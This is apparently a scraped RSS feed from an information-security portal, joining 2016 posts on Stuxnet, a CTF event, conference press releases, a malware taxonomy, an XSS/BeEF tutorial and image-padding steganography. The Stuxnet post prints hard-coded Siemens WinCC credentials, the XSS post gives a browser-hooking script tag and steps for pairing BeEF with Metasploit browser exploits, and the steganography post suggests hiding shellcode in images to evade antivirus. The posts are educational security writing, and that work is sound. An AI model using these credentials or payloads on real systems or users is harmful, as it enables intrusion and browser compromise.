https://www.bluekaizen.org Information Security Portal Sat, 30 Mar 2019 12:58:35 +0000 en-US hourly 1 https://wordpress.org/?v=5.2.1 https://www.bluekaizen.org/cypertalents/ Wed, 22 Mar 2017 08:08:44 +0000 http://www.bluekaizen.org/?p=3864 Click here for more details]]> https://www.bluekaizen.org/stuxnet-part2-and-the-truth-shall-set-you-free/ Wed, 30 Mar 2016 10:32:07 +0000 http://www.bluekaizen.org/?p=3760   PART 1  of Stuxnet article: http://goo.gl/Xi7fU7   What is Stuxnet: it’s the most complicated piece of malware ever written. Up till now there has been wide speculations that it was written by a specific country to attack the Siemens computer control systems used in the nuclear program of Iran. Security experts heavily criticized Siemens because the worm exploited, among many things, a “hard coded password” in the Siemens system. The Stuxnet worm infected critical energy companies in 125 countries.   Siemens Internal CERT (Computer Emergency Response Team) released some slides about Stuxnet as a form of “Official Communication” within their constituents. The slides were taken offline few hours later.   But as I was reading through the slides I decided to take a copy just in case they do just that. In the official slides (Here), Siemens confirmed that Stuxnet was a “targeted” attack by using terms like “targeting a very specific configuration, certain PLC blocks and specific processes or (project)“. These bold statements simply means that Stuxnet makers had (one target) in mind, and this should eliminate any theory out there denying that its a state sponsored malware.   The slides confirmed that the malware is capable of transferring data outside of the infected system back to the command and control servers, yet nothing has been proven specially that the two C&C servers ( • www[.]mypremierfutbol[.]com • www[.] todaysfutbol[.]com ) were brought down by Symantec. “I would like to add that both servers where located in Germany”.   Then the Siemens slides claim that all known infections are now clean and zero enterprise damages reported. Yet they didn’t specify their definition of “damage”, is it seeing the enterprise up in flames or few bytes of data going out? The slides go on listing the great deeds of Siemens since the discovery of the malware: “white papers, cleaning tools, contacting customers, working with top AV vendors, even magazine interviews”. Isn’t this what they are paid to do?   What is really strange is their genius conclusion that future infections are “unlikely”, and this is due to the fact that the malware pattern is now detected by up to date anti-virus programs. Eureka !! Yes, future “Stuxnet” infections might be unlikely, but this is certainly not the end of this type of attacks as long as top vendors like Siemens still use “hard coded & publicly available” passwords on critical systems in the year 2010 and don’t even admit that this is the REAL problem.   I was able to locate the hard coded (builtin) user names and passwords in Siemens technical online forums: login=’WinCCConnect’ password=’2WSXcder’ login=’WinCCAdmin’ password=’2WSXcde   Another statement that also reflects severe undermining of the terms “due diligence, and responsibility” is a question they highlighted in yellow: “Has the customer done all he can?“. Imagine a car manufacturing company that sold you a very expensive car equipped with an advanced airbag system, then someone smashes into your car and the airbag doesn’t work, while in hospital the car company lawyer asks you why didn’t you bring an airbag from home just in case!   About The Author Omar Sherin, Mr. Omar Sherin is the head of critical information infrastructure protection (CIIP) at Qatar Computer Emergency Response Team (Q-CERT), an ictQATAR initiative. In this role he participates in technically assessing critical infrastructure, drafting guidelines such as the Qatari National ICS Security Standard, and conducting Qatar’s national cybersecurity drills. He is also an international partner of the Industrial Control Systems Joint Working Group (ICSJWC) and a certified business continuity professional, certified ethical hacker, and ISO 27001 lead auditor. He has more than 11 years of professional experience in information security and resiliency, and has worked for several multinational firms in the oil and gas sector.]]> https://www.bluekaizen.org/gisec-ctf-capture-the-flag-competition/ Tue, 15 Mar 2016 09:29:56 +0000 http://www.bluekaizen.org/?p=3776 A Head To Head Battle for the Future of Technology For the first time in the GCC the world’s greatest security enthusiasts will test their mettle in a head to head cyber security competition covering a range of technology challenges from network security to cryptography, web security and digital forensics.   JOIN THE CTF COMPETITION TODAY   Future Technology Week’s Capture-The-Flag Competition, held in association with CyberTalents.com, will see cyber security enthusiasts take part in various challenges to find the hidden ‘flag’ across a range of categories covering multiple levels of difficulty including: Reverse engineering Network security Cryptography Web security Network security Digital forensics TIMINGS 8 am – 5 pm on 31st March 2016. PRIZE AED 25,000 will be awarded to the winning team at the close of the competition. Prize Sponsor   About Offensive Bits Offensive Bits is an Emirati information security consultancy company founded by two UAE nationals security experts. OffensiveBits visionary co-founders realized the need for high quality security consultancy service in the region, due to the ever increasing threats landscape and the advancement in the attack methods and techniques. Therefore, OffensiveBits was established to ease security challenges for organizations by identifying the security weaknesses in patched and hardened systems. In addition, Offensive Bits is actively contributing to the information security community in UAE and in the region by reporting critical security issues and zero-days vulnerabilities to government entities, federal authorities and affected vendors. HOW TO TAKE PART Qualification Phase The Capture-The-Flag Competition is open to competitors from across the globe, with each participant having to pass an online qualification prior to the event ensuring their knowledge and skills are up to the required level. Teams who are able to solve their qualification challenge will then be eligible to play in the final phase held live at Future Technology Week at Dubai World Trade Centre. Grand Final Once each competitor has passed the qualification stage they will then be able to form teams of between two to five competitors. Each team will contain a number of different technology skill sets in order to allow them to solve as many challenges and accumulate as many points as possible? At the end of the event the team with the most points will be crowned the Future Technology Week CTF Champion 2016. ABOUT CYBERTALENTS.COM   The first Capture the Flag competition will be organised in collaboration between DWTC and CyberTalents.com. Cyber Talents is a platform that helps universities, schools, governments and companies to discover and recruit talents across a range of cyber security fields through hosted Hackathons, competitions and online lab assessments.   ABOUT OFFENSIVE BITS     Offensive Bits is an Emirati information security consultancy company founded by two UAE nationals security experts. OffensiveBits visionary co-founders realized the need for high quality security consultancy service in the region, due to the ever increasing threats landscape and the advancement in the attack methods and techniques. Therefore, OffensiveBits was established to ease security challenges for organizations by identifying the security weaknesses in patched and hardened systems. In addition, Offensive Bits is actively contributing to the information security community in UAE and in the region by reporting critical security issues and zero-days vulnerabilities to government entities, federal authorities and affected vendors.  ]]> https://www.bluekaizen.org/rsa-conference-2016-brought-together-top-information-security-experts-to-debate-critical-cybersecurity-issues-at-25th-anniversary-event/ Tue, 08 Mar 2016 10:57:04 +0000 http://www.bluekaizen.org/?p=3770 March 7, 2016 RSA CONFERENCE 2016 BROUGHT TOGETHER TOP INFORMATION SECURITY EXPERTS TO DEBATE CRITICAL CYBERSECURITY ISSUES AT 25TH ANNIVERSARY EVENT Record Number of Attendees Filled the Moscone Center to Set the Industry Agenda for 2016 SAN FRANCISCO – March 7, 2016 – RSA Conference, the world’s leading information security conferences and expositions, concluded its 25th annual event last Friday at the Moscone Center in San Francisco. Keynotes, sessions and debates focused on the Internet of Things, industrial control systems, encryption, artificial intelligence and machine learning, crowdsourcing, healthcare, automotive, and more, with many reflecting current industry news. A record number of more than 40,000 attendees experienced keynotes, peer-to-peer sessions, track sessions, tutorials and seminars. “RSA Conference continues to be the premier security event, with each event seeing more attendees than ever before, and RSA Conference 2016 was no exception,” said Linda Gray, General Manager of RSA Conference. “Our 25th anniversary marks not only a milestone in the conference’s reach and impact in this important industry, but is also a testament to the work we as a community are doing together. There were a lot of great discussions over the course of the week, and I look forward to the positive impact these will make on our world moving forward. We thank the cybersecurity community for its continued support, innovation, spirit and drive as we shape the future of our industry, together.”   RSA Conference 2016 highlights include: Hot session topics and presentations: – Gerhard Eschelbeck, Vice President Security Engineering at Google, gave a packed house an inside look at what it’s like heading up security for one of the world’s biggest tech companies and hacker targets during “My Life as Chief Security Officer at Google.” – Ben Rothke, Senior eGRC Consultant, The Nettitude Group; Phil Agcaoili, SVP & Chief Information Security Officer; Elavon, Roland Cloutier, VP & CSO, ADP, Inc. and Jack Jones, EVP Research & Development, RiskLens shared their strategies for success at the “Habits of an Effective CISO” panel. – Attendees learned how to effectively tell their security story and speak the language of business at “The Measure of Success: Security Metrics to Tell Your Story” panel with Lisa Lee, Senior IT Examiner, Office of the Comptroller of the Currency; Julie Bernard, Principal, Cyber Risk Services, Deloitte and Wendy Frank, Principal, PwC. – First time presenters William Bengtson, Senior Security Program Manager, Nuna Health and Robert Wood, CISO, Nuna Health, Inc. highlighted how defenses and strategy must evolve with attacker tactics, techniques and procedures at “The Rise of the Purple Team.” – As the year begins, Mario Vuksan, CEO, ReversingLabs, reviewed fundamental industry shifts and how to adopt how to trust and build software at “Threats of Greatest Consequences Heading into 2016.” Phantom was named “RSA Conference 2016’s Most Innovative Startup” by the Innovation Sandbox’s judges’ panel comprised of technology, venture and security industry thought leaders. The Conference reached a new audience at the first-ever, interactive CyberSmart: Parents Education Workshop. Parents from across the Bay Area gathered to learn more about how to teach their children to interact safely with technology. The inaugural Security Scholars Program brought together the brightest up-and-coming cybersecurity students from 10 participating public and private universities with leading experts, peers and conference attendees. Throughout the week, students made professional connections, discussed industry trends and participated in conference activities. The program concluded with a Poster Exhibition where scholars demoed and discussed their work while connecting with industry leaders. RSA Conference donated space within the Moscone Center so industry professionals could meet the challenge to “go bald” with St. Baldrick’s Foundation to help raise awareness and money for childhood cancer research. The 19th Annual RSA Conference Awards program highlighted the work of four security professionals in the fields of mathematics, public policy and security practices. This year’s winners included: Art Coviello, Jr – Lifetime Achievement Award Roland Cloutier, CSO, ADP – Excellence in the Field of Information Security Professor Ueli Maurer, ETH Zurich – Excellence in the Field of Mathematics Christopher M.E. Painter, Coordinator for Cyber Issues, U.S. Department of State – Excellence in the Field of Public Policy RSA Conference 2016 Asia Pacific & Japan takes place July 20-22, 2016, at Marina Bay Sands in Singapore. Additionally, RSA Conference returns to Abu Dhabi in Nov. 15-16, 2016. RSA Conference 2017 will take place Feb. 13-17 at the Moscone Center in San Francisco. EXHIBITOR QUOTES “RSA Conference showcased the breadth, depth and creativity of technologies and people arrayed against bad actors worldwide, whose singular mission is to penetrate and to exploit. Speaking with counterparts from organizations focused on protecting data, networks and applications, I gained even more confidence that collectively we’re up to the challenge. While the attack methods and surfaces are constantly changing, defending against penetration and internal leaks remains a major focus. At RSAC this year we saw a marked increase in the number of solutions coming market that are focused on doing both through better application security. As organizations continue to advance their application security initiatives, collectively we will adapt and continue to thwart the bad guys. – Lou Shipley, CEO, Black Duck “RSA Conference 2016 was a strong reiteration of the message that the industry needs a more comprehensive approach to ensuring information is secure regardless of platform. As security professionals, we’re responsible for ensuring information is protected regardless of device, platform or operating system. We don’t just use one, we use all solutions: cloud, mobile, network, data center, SaaS. Businesses need a method to ensure control between traditional infrastructures, cloud and mobile to establish trust with the customers. To get out of a reactive state and into proactively defending data, companies have to look for solutions that enable a control plane. Without it, there is no single source of trust.” – Stan Black, CSO, Citrix “We had an incredible week at RSA Conference, an event known for gathering the biggest movers, shakers and disruptors in the industry. This year, it is clear enterprises are making great strides to adopt new technologies to help them battle the onslaught of cyber threats. As a company recently out of stealth, Fireglass...]]> https://www.bluekaizen.org/infoblox-to-showcase-market-leading-dns-security-solutions-at-gisec-2016/ Thu, 03 Mar 2016 14:11:21 +0000 http://www.bluekaizen.org/?p=3765     DUBAI, United Arab Emirates, 3rd March, 2016: Infoblox Inc., the network control company, today announced its participation at Gulf Information Security Expo & Conference (GISEC) 2016 taking place at Dubai World Trade Centre between 29th – 31st March,  2016. As the industry leader in DNS, DHCP, and IP address management, the category known as DDI, the company will be demonstrating it’s critical network services and solutions that protect Domain Name System (DNS) infrastructure, automate cloud deployments, and increase the reliability of enterprise and service provider networks around the world.   Cherif Sleiman, General Manager, Middle East at Infoblox says, “Our solutions reduce the risk and complexity of networking. The company’s solutions automate network-control functions to reduce costs and maximize uptime, and they protect against the rising flood of malware and distributed-denial-of-service DDoS attacks. From discovery, configuration and compliance to DNS, DHCP, and IP address management, our technology automates and simplifies complex processes. And our purpose-built DNS security solutions defend against a wider range of threats than any other product available.”   “It’s critical that the technology deployed for network control provides maximum protection and offers minimum attack surface. Infoblox clearly differentiates from other vendors from a security perspective. From our highly secure hardware form factor, to our hardened OS, to the variety of security features in our applications—no other network control vendor focuses more on security than Infoblox,” continues Cherif.   Infoblox will be using GISEC as an opportunity to also educate attendees about its recent acquisition of IID, a leader in global cyber threat intelligence. Prioritizing threats, getting contextual information and operational viability are top challenges organizations face when trying to assimilate threat intelligence and respond to threats. According to Gartner’s 2015 Market Guide for Security Threat Intelligence Services, by 2018, 60% of enterprises will utilize commercial threat intelligence services to help inform their security strategies. However, enterprises still struggle to absorb, contextualize, and respond to the information in an effective manner. Infoblox and IID bring together threat intelligence and enterprise context to take action at the control point of the network. With Infoblox’s acquisition of IID, customers can prioritize, protect and predict the security threats facing their networks.   With Infoblox’s acquisition of IID, customers will benefit from on-premise synergies of threat intelligence and context driven response, protection for company devices that are off premises and sharing of highly prioritized and actionable threat intelligence to improve efficacy of broader security ecosystem.   “Acquiring IID helps enable Infoblox to offer deeply integrated threat intelligence with our on-premise solutions. This will help give customers more understanding of security events, going beyond what would be possible if we only set up a partnership with IID,” concludes Cherif.   Infoblox will be exhibiting at GISEC from Help AG stand number B-100 located in Sheikh Rashid Hall, Dubai World Trade Centre.     -Ends-   Photo Caption: Cherif Sleiman, General Manager, Middle East at Infoblox                 Product Information Contact: Mr. Cherif Sleiman General Manager Middle East Infoblox Dubai, UAE Email: csleiman@infoblox.com   Media Contact: Colin Saldanha PROCRE8 Email: colin@procre8.biz  ]]> https://www.bluekaizen.org/stuxnet-part1-the-perfect-crime/ Mon, 29 Feb 2016 13:30:53 +0000 http://www.bluekaizen.org/?p=3752   Summary Recently there has been a new computer worm that has gained lots of attention from the computer security community, the energy sector, the media and even the general public. It’s the “Stuxnet” worm.   The reason for this unsurprising attention is because “Stuxnet” is one of the most complex computer threats the world has ever seen. I decided to write two articles about the worm, the article that you are currently reading will be the first and shall act as an introduction to the Stuxnet worm, its motives, the attack vectors and the motives behind it, the second article shall go under the hood and take a closer look at the technical aspects of the worm and the SCADA systems targeted.   1 – Introduction Stuxnet is a computer worm that was written to target Programmable Logic Controllers (PLCs). PLCs are a part of a bigger automation environment called SCADA (supervisory control and data acquisition) systems; SCADA systems are special computer programs used to run mega infrastructure projects, like gas pipelines, electricity grids, nuclear facilities and power plants.   Stuxnet was carefully written to “access, and in some cases reprogram” those PLCs by modifying certain pieces of the code stored on them. The purpose of this “reprogramming” is to make those PLCs work in a manner the attacker is tended and to hide those changes from the operator of the equipment.   In other words, the Stuxnet creators wanted to plant something, hide it well and then have the option to control, eavesdrop or cause damage from a remote location In order to achieve this multipurpose goal; the worm creators used a record number of different com ponents to increase their chances of success.   This includes but not limited to: ● zero-day exploits (A total of four un-patched Windows holes to facilitate the worm entry, Initial infections were probably caused by USB)   ● A Windows root kit (A collection of malicious programs designed for windows operating systems – like a Swiss army knife this includes an array of tools and can do many things)   ● The first ever SCADA/PLC root kit (A collection of malicious programs designed for control systems – like a Swiss army knife this includes an array of tools and can do many things)   ● Antivirus evasion techniques   (Special techniques to trick the Antivirus into believing that nothing is wrong)   ● Complex process injection and hooking code   (Injects itself into certain parts of the SCADA software, allowing it to execute with a high privilege)   ● Network infection routines   (Uses the infected LAN network to replicate and multiply)   ● peer-to-peer updates (Can be updated remotely)   ● Fake driver signed certificates (Used a signed yet expired “Realtek semiconductors .inc” signed hardware driver certificate to trick windows into inherently trusting the malware)   ● And a command and control interface. (Can be controlled remotely)   Stuxnet creators were very professional in hiding their tracks, that it’s nearly impossible with the current information we have to know who wrote it. The source code of Stuxnet is full of references that have caused researchers to point fingers towards Israel, being currently engaged in a political dispute with Iran regarding its nuclear program.   One of the most notable references is the word “Myrtus,” which the name of a specific Stuxnet file, according to the New York Times, linguists and Biblical scholars also highlighted that the term’s usage could refer to the Book of Esther in the Bible’s Old Testament.   In the Book of Esther, Jewish forces — after unraveling a Persian attack plan — stage a preemptive and successful assault against their adversaries. (Source New York Times 30/9/2010)   Another reference Buried in Stuxnet’s code is a marker with the digits “19790509” that the researchers believe is a “do-not infect” indicator. If the marker is found on a PC this means it’s already touched/ infected or exempted and the worm will stop in its track. The researchers — Nicolas Falliere, Liam O Murchu and Eric Chen — speculated that the marker represents a date: May 9, 1979.   “While on May 9, 1979, a variety of historical events occurred, according to Wikipedia “Habib Elghanian was executed by a firing squad in Tehran sending shock waves through the closely knit Iranian Jewish community,” the researchers wrote. (Source Computer World 30/9/2010) But again this can only be misleading information placed on purpose.   If the perfect crime is a crime that gets the perpetrators what they want without leaving a serious trace, then indeed Stuxnet is the perfect crime.   2-  First Discovery Stuxnet was first announced in June 2010, although recent reports prove that it was already infecting systems since mid 2009. This period between the first infection and the announcement of discovery is probably due to the fact that the majority of infections were in Iran. And that the creators of the worm were not seeking fame or media credit. They had a fixed target. The following table shall make it easier to follow the sequence of events.       3 -The Target   It’s now evident that Stuxnet is targeting only industrial control systems, especially the ones in Iran. The ultimate goal of Stuxnet is espionage and sabotage the critical infrastructures (Like gas plants, refineries, nuclear facilities…etc) that use this special Industrial Control Systems Software. The espionage is by checking for very specific variables on the infected host, those carefully selected variables can easily give away a lot of information about the type of operations taking place in the targeted facility. The damage can be easily achieved by remotely instructing the worm to “reprogram” certain variables that can make the facility over heat for example.   4 -How does it spread?   The Stuxnet malware was initially spread via USB key. It may also be propagated via network shares from other infected computers sharing the same local network (LAN). As noted above, Stuxnet uses a specially crafted Windows shortcut placed on USB drives to automatically execute malware as soon as the .lnk file is read by the operating system. Disabling the auto-run feature is useless against this attack. In other words, simply browsing a USB drive using an application that displays shortcut icons (like Windows Explorer) runs the malware without any additional user interaction. Once the computer is infected, it will attempt to infect any other USB drive inserted into it. It is likely that any USB drive inserted in a machine will be viewed using some sort of file explorer, thus the chance of infection is very high.   5- Infection Rates   According to a recently published report[2] from security firm “Symantec”, the infected hosts have reached nearly 100,000. It’s very alarming that such a high number of infections...]]> https://www.bluekaizen.org/book-review-the-art-of-deception-controlling-the-human-element-of-security/ Thu, 25 Feb 2016 13:15:48 +0000 http://www.bluekaizen.org/?p=3743   In Wikipedia’s article for the word Hacker, Kevin Mitnick -the book’s authoris the first mentioned name under the “Notable Security Hackers” section. Kevin was form-erly known as “the most wanted computer criminal  in United States history”.   According to Kevin, what he did wasn’t even against the law at that time, but it became  a crime after a new legislation was passed. The book is mainly concerned with ex-ploring the term “Social Engineering”, and illustrating how it can be applied to easily breached security systems. It shows that no matter what antivirus, firewall appliances or software you use, the human factor remains the weakest link of security.   It starts with a preface giving a brief bio-graphy of Kevin. His father had split from his mother when he was three years old, and he was raised by his mother. She worked hard as a waitress to support them both, so unfortunately she had to leave him most of the time on his own. He describes himself in his childhood as being his own babysitter. His early skills became apparent when he -at the age of 12- discovered a way to use the buses to travel free throughout Los Angeles. Later on, during his high school years, he met another student who was caught up in a hobby called “Phone phreaking”. As Kevin describes it: “Phone phreaking is a type of hacking that allows you to explore the telephone network by exploiting the phone systems and phone company employees”.   This was when he started using what was called later “Social Engineering”; that is deceiving and manipulating people into giving out confidential information which they normally would never reveal to a stranger. The first part of the book is a demonstration of the reasons behind calling the human factor as the security’s weakest link. In the second part, Kevin gives the reader some examples of how Social Engineering can be used, through some fictional stories. H ends each story with analyzing the con in the story, and then a “Mitnick Message” with a recommendation of how to deal with such a scenario.   The stories are categorized in chapters according to the theme used for “Social Engineering” and tricking the victim. The titles of the chapters easily attract the reader’s curiosity to understand how can a trick like that work for a hacker, for example “The Direct Attack: Just Asking for It” or “Using Sympathy, Guilt, and Intimidation”.   The third part is somehow similar to the second one, but it shows how can Social Engineering be combined with hacking, through some more fictional stories demonstrating how a corporate’s security premises can be breached using Social Engineering, to steal confidential information. Part four is Kevin’s general recommendations for corporates to be able to prevent successful Social Engineering attacks on their organizations. It includes tips on how to build a successful security training program and recommended corporate information security policies that can be customized for any organization and applied instantly to protect the company’s information.   The book is very well written, with Kevin simplifying the concepts and presenting the book in a way that even non-technical readers would find both informative and entertaining.   About The Authors :   Mohamed Mohie, IS Engineer]]> https://www.bluekaizen.org/advanced-exploitation-of-xss/ Thu, 25 Feb 2016 11:26:22 +0000 http://www.bluekaizen.org/?p=3727   Disclaimer: The information provided in this article is intended for educational purposes only and should not be used in any illegal way.   Today, we will talk about not so typical cross site scripting exploits. But first let us explain what is XSS? (you can skip this part if you’re familiar with XSS).   What is XSS? XSS is an acronym for cross site scripting. The X is used instead  of a C, since the acronym CSS is already taken by Cascading Style Sheets. XSS happens when a web developer replies a user input without any filtration. So if a malicious attacker send a html code, the browser will simply render it with the page being retrieved from the webserver.   Is it really dangerous?? The attacker can not access the server right??   Well, some people just ignore XSS (I reported two of them in a live websites, one was simply ignored and the other one is still there till today and the administrator told me that it is not that dangerous). Even if they know that exists because it is not effective against the server but what if an attacker puts a code that can steal a cookie that contains the session information and the system administrator visits the page ofcourse now the attacker can log in as a system administrator and do whatever they want the attacker can do this to a normal user as well.   Another attacking vector is social engineering because I can literally put any thing in the affected website for instance I can put a fake login form that will send me the user credentials once the user logs in or he can redirect them into another website.   How can an attacker abuse it and make money??   As I mentioned before the attacker can use to steal cookies or social engineering but what is really dangerous is using it for creating a botnet. Botnets are groups of computers owned by hacker this can be done by finding a XSS in a website and then injecting a code using this XSS that exploits a browser vulnerability to control the website visitors’ computers. Once they do that, they will start making money by renting these computers for other hackers for tasks that takes a lot of time if they use only one computer. Actually you can rent a botnet with 10,000 computers for only  20$/hour which can launch distributed brute forcing attacks or breaking password hashes or ciphers   Is it easy to create a botnet?? Thanks to a web application known as beef (Browser exploitation framework) you can collect a lot of zombies (the victim in a botnet is called a zombie) and it is an easy and automated process.   How to use beef??   Beef is installed by default in backtrack4-final distribution all what you need to do is to start it to do this click on the main menu button and then go to services -> beef -> setup beef.   In the first page you have to enter the configuration password (The default one is BeEFConfigPass).       click on apply config button then click finished after that you will see the front page of beef on the left you will see a list of the so called zombies (the computers that you control) at the right of the page you will see the logs. The centre is the place where the configuration options for any module that you choose from the menu bar.         The menu bar: At the upper menu you will see some sub menus the first one is “view” which allows you to customize the view of the page also it contains an example webpage that you can use to test beef. The second one is the zombies menu this is the menu where you can choose a zombie to view the machine information.   The third one is the standard modules and those are used mainly for gathering more information about the victim like whether they are using java or not also you can detect flash or QuikTime or vb script. These information allows to build the attack against the victim.   The fourth menu is called browser modules and it contains some browser exploits a malicious java applet but the good thing is that it can use metasploit browser exploits. Now to use beef you have to redirect the victims to your website or to a website that is vulnerable to XSS and in both cases you have to include the beef script which means   you have to add the following line to the page using XSS or in your website if you want to create a malicious website: <script language=javascript src=http://127.0.0.1/beef/hook/beefmagic.js.php></script>   To see how it looks when someone visits the infected page you can go to the example page from the same machine or another machine. Now you will see that your ip address is added to the list on the left side. From the zombies menu (on the upper menu bar) choose your IP address.     You can see details about the operating system and the browser used. Click on the standard modules and choose detect flash module for example you will see two buttons one is “set autorun” button if you clicked that button this means that the module will run automatically every time someone visits the page and the other button “send now” is used to run the plugin manually.     The browser module menu is used for exploitation and what I like to do is to use metasploit browser modules to exploit the victim’s browser to do this follow the steps. 1. setting up metasploit : beef uses something called XML RPC (remote procedure call) to connect to metasploit so first you have to run metasploit xml rpc daemon use the following command(go to metasploit folder first):./msfconsolemsf > load xmlrpc Pass=BeEFMSFPass  where BeEFMSFPass is the default password that beef uses to connect to metasploit   (you can change it in the beef/include/msf.inc.php file also you may need to change the ip adress in that include file).   2. Go to browser module -> metasploit browser exploit you will see a page where you can choose any of metasploit exploits...]]> https://www.bluekaizen.org/what-is-a-malware/ https://www.bluekaizen.org/what-is-a-malware/#respond Wed, 24 Feb 2016 12:09:27 +0000 http://www.bluekaizen.org/?p=3722   Malware is formally defined in Wikipedia as, “Software designed to secretly access a computer system without the owner’s informed consent”. According to Microsoft’s Technet as, “any software designed to cause damage to a single computer, server, or computer network”. So the term itself is generic for all types of malicious softwares that run stealthily without the user’s intervention which they cause damage to the CIA Triad, for example, stealing the users’ sensitive data (loss of confidentiality), modifying the contents of the executable files (loss of integrity), or disabling services and crippling the OS (loss of availability).   Nevertheless, this definition should not be confused with Employee Monitoring and Computer Surveillance Software, which are software that can be stealthily deployed by the system administrators in the corporate to monitor and supervise all their employees computers. As these programs have some resemblance with the definition of malware, they are used  to enforce the enterprise policies on the employees. These enterprise policies  include monitoring and logging the application of the employees to reportthe installation of undesirable software if that application somehow subverted the host policy , recording all documents and files opened by the users, or logging their web browsing activity, commonly known examples are Nexthink , spectorsoft and Surveilstar .   Malware generally is divided into broad categories, among which are;   a. Viruses : -A software designed to propagate through host files by attaching itself to other files. It can evade detection and destroy or damage systems automatically.   -Divided according to their detection evading techniques which are –but not limited to- : i. Stealth Viruses which manipulate the operating systems by sending modified data to the virus scanners to indicate normal operation.   ii. Retroviruses which attack the antivirus software by damaging their virus signatures for example, Polymorphic Viruses which change their own content by encryption or modification in order to avoid detection. iii. Armored Viruses which are coded to prevent their debugging/disassembling of engineering which slows or hinders the process of analyzing the virus internals.   iv. Encrypted Viruses which rely on encryption to change their look every time they infect a system.   v. Multipartite Viruses which utilize combinations of these detection evasion methodologies.   -Some of the famous viruses are CIH 1998 and Michelangelo 1991.   b. Worms : -A software designed to propagate without host files to evade detection and completely consume the systems and networks resources automatically. They do not rely on attaching other files, bu rather, reside in the memory and utilise the network connections, emails or P2P programmes and exploiting applications vulnerable to propagation.   -Some worms contain and deliver viruses to the infected systems.   -Some of the famous worms are Conficker 2008 and SQL Slammer 2003.   -In fact, the bold boundaries between internet worms and viruses are blurring with some malware such as, Melissa virus which utilises the mass-mailing method of propagation.   – Due to the absence of the replicating ability of the viruses, worms are generally easier to be removed from infected systems than viruses.     c. Trojan Horses : -A software designed to look like a legitimate and a useful software, but it contains malicious payload within it. It can propagate email attachments or downloaded files of unaware users.   They resemble worms in their standalone structure unlike viruses and differ from both worms and viruses by their dependency on the human intervention not on automatic propagation.   -It consists generally of two parts. The server part which is when downloaded and executed by the unaware users opens a specific port on the victim machine. The other part is the client part which is used by the cracker to connect to the victim machine using the already opened port and provides access to the infected system.   -Common examples are Back Orifice and Subseven.     d. Spyware -A software designed to monitor and steal the victims private and personal information like credit card numbers and online games passwords. They are unable to self-replicate, so they need human intervention to be installed on each victim. They propagate usually with freeware on the internet like toolbars or by visiting malicious websites which exploit the web browsers by tricking them to unintentionally download the spywares.     -They can log keystrokes to capture passwords aka stealware, monitor and report the web browsing activity, or redirect users to their websites .   -Examples are Bonzi Buddy and Xupiter.   e. Adware   -A type of spyware that monitors the users web browsing activity, send them to remote servers accompained with unsolicited pop-up advertisement.   -Examples are Cydoor, Gator and Comet Cursor.     f. Scareware -Aka Rogue Security software is a software designed to look like a legitimate and useful antivirus that   can be purchased, but it has malicious payload and completely useless.   -Scarewares rely on social engineering for propagation by falsely warning the users that their workstations are infected, and that they can remove the infecting malware if the user purchased their fake antivirus software.   -An example is SpySheriff.     g. Logic Bombs   -Malware that resembles viruses in attaching itself to other executable files. When the file is executed, the logic bomb is run first and checked if the trigger for its operation is achieved. If not, the control returns to the executable files. And if it successed, the logic bomb executes its malicious payload.   -One of the notable examples is the Chernobyl virus which attempts to overwrite the Bios on 26 April of every year.     h. Rootkits -Malware that provides root level access to the victim operating system by modifying or replacing the basic blocks of then operating system.   -Rootkits are known to be difficult to be detected or removed by the antimalware scanners.     -One of which was Tornkit which is a linux rootkit.     i. Botnet -A bot is a software agent that is mostly associated with other malware mainly viruses, worms, trojans and rootkits. When installed, it informs a controller remote server and complies with its commands.   -Mostly used by the controller cracker aka operator as a network-for-rent, that is, a customer purchases a number of compromised machines and provides a spam message to the operator or a target IP to attack, and then the operator instructs the infected machines – mainly using IRC or webservers – to send spam messages, or initiate a massive Distribute Denial of Service Attack on that targeted IP.   -An example is Mariposa Butterfly.     j. Backdoors -A backdoor is any deliberate configuration or software that provides remote access   -with bypassing the normal authentication procedures- to a system.   -This not essentially a malware since not only trojans and rootkits leave backdoors in the infected system. Some legitimate programmes do so to facilitate administration, recovery or even anonymous information collecting....]]> https://www.bluekaizen.org/what-is-a-malware/feed/ 0 https://www.bluekaizen.org/hiding-data-inside-the-padding-area-of-files/ https://www.bluekaizen.org/hiding-data-inside-the-padding-area-of-files/#comments Wed, 24 Feb 2016 08:06:46 +0000 http://www.bluekaizen.org/?p=3708   Today, we will talk about Steganography, which is the science of hiding information inside other data instead of just encrypting it. Steganography might be thought as the cousin of cryptography and, amazingly, both can be mixed to have something stronger than both.   In most cases, this can be done by changing small number of bytes in a file to the wanted data which can be an image file or a sound file.To make this clear, check the example below. One of the following images contains the message, “My secret message”. Are you able to tell which of them contains the message?       Actually yes. By zooming in the second image, you will notice that the image has some colored pixels at the bottom left corner. Those pixels are the ones that contain the secret message   The following picture shows the image opened with a hex editor (you may use hex workshop in windows, ghex or bless hex editor in Linux):     What is going to be done is that the information will be hidden inside, what is called, the padding area. Before that, let us first talk about what is the padding area (you can skip this part if you are already familiar with the padding area).   What is the padding area??   Some bytes are added to a file or a network packet of a four byte alignment. These bytes are added because the computer is capable of handling data which are aligned of multiples of four bytes. It is faster since the registers and the buses are 32 bits (assuming a 32 bits machine). Also, one of the obvious examples is your graphics card which the frames sent to it are to be aligned of four bytes.   Let us examine a simple bmp file and see the padding area. This example is taken from bmp file specifications in wikipedi:     This table shows how the image is stored in the file: As seen above, the image of 4 pixels has four bytes wasted, and these bytes will not be rendered by any graphics application. In addition, no application cares about their value, so the hidden message is saved on them.   Let us do some test on it. In this 4 pixel image, the word “test” is stored in those 4 bytes and notice if the colors are changed. One of the following two images contains the message and the other one does not contain anything:       As seen above, the colors have not changed at all. In the following image, the second picture which contains the word “test” changed its colors when opened in ghex:       How to calculate the available padding space? The available padding space is calculated by using the following formula (assuming a 32-bit machine):   (Number of pixels in a row * number of bytes for each pixel)%4 Where can it be used?   It can be used for hiding information, but also it can be used for uploading shell codes in websites that allows image uploading. However, this can be used by worms instead of uploading the shell code to a server. If it is used to store a shell code, will the antivirus be able to detect that?   It is believed that antivirus will not be able to detect that since the signature will be changed by either changing the image or rather its dimensions.     About The Author Fady Osman, Information Security Consultant at ZINAD  ]]> https://www.bluekaizen.org/hiding-data-inside-the-padding-area-of-files/feed/ 1